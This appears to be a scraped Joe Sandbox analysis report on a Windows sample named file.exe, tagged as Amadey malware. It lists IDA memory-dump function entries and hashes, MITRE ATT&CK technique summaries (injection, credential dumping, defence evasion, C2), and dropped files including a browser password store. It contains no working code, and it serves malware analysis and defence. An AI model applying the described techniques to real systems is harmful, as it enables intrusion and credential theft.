Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_ParseTupleValid
String ID: :IsValid
API String ID: 2541654197-2800628479
Opcode ID: c205e6c6629add5205025c12b4e55ecd6f97f98ddf72bd804bbb35d485ae357b
Instruction ID: 02b7030897fbd98458db8f2f83b3f39a371228d5d7f1e736a2251a3433e618c5
Opcode Fuzzy Hash: c205e6c6629add5205025c12b4e55ecd6f97f98ddf72bd804bbb35d485ae357b
Instruction Fuzzy Hash: 07E0EC52F19A0682EB585BEAAC5007912D5AF48FD5F441434DE1D86371EE3CD5E58200

Function 00007FF8B7E89300 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E89316
GetSidSubAuthorityCount.ADVAPI32 ref: 00007FF8B7E8932C

Strings

:GetSubAuthorityCount, xrefs: 00007FF8B7E8930F

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_AuthorityCountParseTuple
String ID: :GetSubAuthorityCount
API String ID: 4231099721-2020981275
Opcode ID: da784ef745ded8b10977a995322f8d6846b7cc8515693475c2a544ad34ee81bc
Instruction ID: db6ed9fdc6a48f6b4dc175427ada86cd3fd9f6a0e9248c73d3b3a94a25a124bd
Opcode Fuzzy Hash: da784ef745ded8b10977a995322f8d6846b7cc8515693475c2a544ad34ee81bc
Instruction Fuzzy Hash: 20E08652F0970282EB0447EAEC5007922909F48FC1F441431DF1D863B1ED3C95E18300

Function 00007FF8B7E892C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E892D6
GetLengthSid.ADVAPI32 ref: 00007FF8B7E892EC

Strings

:GetLength, xrefs: 00007FF8B7E892CF

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_LengthParseTuple
String ID: :GetLength
API String ID: 1894485733-295138441
Opcode ID: 3c69dd88cdf965b284251de54f93c677440366d6c9c987ed12ccb91b8556208d
Instruction ID: 831663fb2e0d667f3000a9cdf678100ed92dd1aa7b9dbbac29ba22efd7312ca6
Opcode Fuzzy Hash: 3c69dd88cdf965b284251de54f93c677440366d6c9c987ed12ccb91b8556208d
Instruction Fuzzy Hash: 46E0EC52F19A4682EB584BFAAC5007D2294AF48FD4F841431DE1D86371EE3CD5E58200

Function 00007FF8B7E88AC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E88AD6
GetSecurityDescriptorLength.ADVAPI32 ref: 00007FF8B7E88AEC

Strings

:GetLength, xrefs: 00007FF8B7E88ACF

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_DescriptorLengthParseSecurityTuple
String ID: :GetLength
API String ID: 840013968-295138441
Opcode ID: 4b502b493f44923badd855b2eabefab93c9aa0276462f2218449576b2ef85afb
Instruction ID: 6fb943e9224b3cd24151d73ca10c34cc4520082ccd162234d3fc767f33361c6a
Opcode Fuzzy Hash: 4b502b493f44923badd855b2eabefab93c9aa0276462f2218449576b2ef85afb
Instruction Fuzzy Hash: DAE0EC52F29B4682FB584BFAAC510791294AF48FD4F841431DE1D863B1EE3CD5E58300

Function 00007FF8B7E88A80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E88A96
IsValidSecurityDescriptor.ADVAPI32 ref: 00007FF8B7E88AAC

Strings

:IsValid, xrefs: 00007FF8B7E88A8F

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_DescriptorParseSecurityTupleValid
String ID: :IsValid
API String ID: 1292091245-2800628479
Opcode ID: 62955e74c7143c37824a64132e3129fc9fe357e4491e50685c69f37ce866d45b
Instruction ID: 293127e2998e692997dda712e0a291843ebb762425aa3e8ffdd7076254ad7985
Opcode Fuzzy Hash: 62955e74c7143c37824a64132e3129fc9fe357e4491e50685c69f37ce866d45b
Instruction Fuzzy Hash: ABE0EC52F19A0682EB585BEAAC510B91294AF48FD4F441431DE1D863B1EE7CD5E58300

Function 00007FF8B7E89200 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E89216
IsValidSid.ADVAPI32 ref: 00007FF8B7E8922C

Strings

:IsValid, xrefs: 00007FF8B7E8920F

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_ParseTupleValid
String ID: :IsValid
API String ID: 2541654197-2800628479
Opcode ID: 0b4349dba64da8df61b8a50073b5194a98f0e01b25cefaace262f8ea508d1991
Instruction ID: 9283a28fbaf224360d5de86995fabe34e22938de8d312bf901883c91ed708ce1
Opcode Fuzzy Hash: 0b4349dba64da8df61b8a50073b5194a98f0e01b25cefaace262f8ea508d1991
Instruction Fuzzy Hash: D6E0EC52F19B0682EB585BFABC540B92294AF48FD4F441430DE1D86371EE3CD5E58200

Function 00007FF8B7E8CC10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON313 ref: 00007FF8B7E8CC35

Strings

ll;POINT must be a tuple of 2 ints (x,y), xrefs: 00007FF8B7E8CC49
POINT must be a tuple of 2 ints (x,y), xrefs: 00007FF8B7E8CC2B

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_String
String ID: POINT must be a tuple of 2 ints (x,y)$ll;POINT must be a tuple of 2 ints (x,y)
API String ID: 1450464846-334919720
Opcode ID: bb86c514a6f5b80bd517a3355d44e97f5c100e51a03659f47b0f39897d6151d1
Instruction ID: 4f212a5575a2c39a94c912f66042fa1f00341fb98305572510ede8dc428f7e0c
Opcode Fuzzy Hash: bb86c514a6f5b80bd517a3355d44e97f5c100e51a03659f47b0f39897d6151d1
Instruction Fuzzy Hash: C3E01AA2E09B46E1EA048B9DD8852A923A0FF49FC8FC59436DB0D47271DE7CD199C301

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\Users\user\AppData\Local\Bunny\Info.txt

C:\Users\user\AppData\Local\D3DSCache\fe8d97be6d92aa78\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

C:\Users\user\AppData\Local\D3DSCache\fe8d97be6d92aa78\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

C:\Users\user\AppData\Local\D3DSCache\fe8d97be6d92aa78\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\0125f40a-81f4-4b90-b64e-fa714bfde452.tmp

Windows Analysis Report
file.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre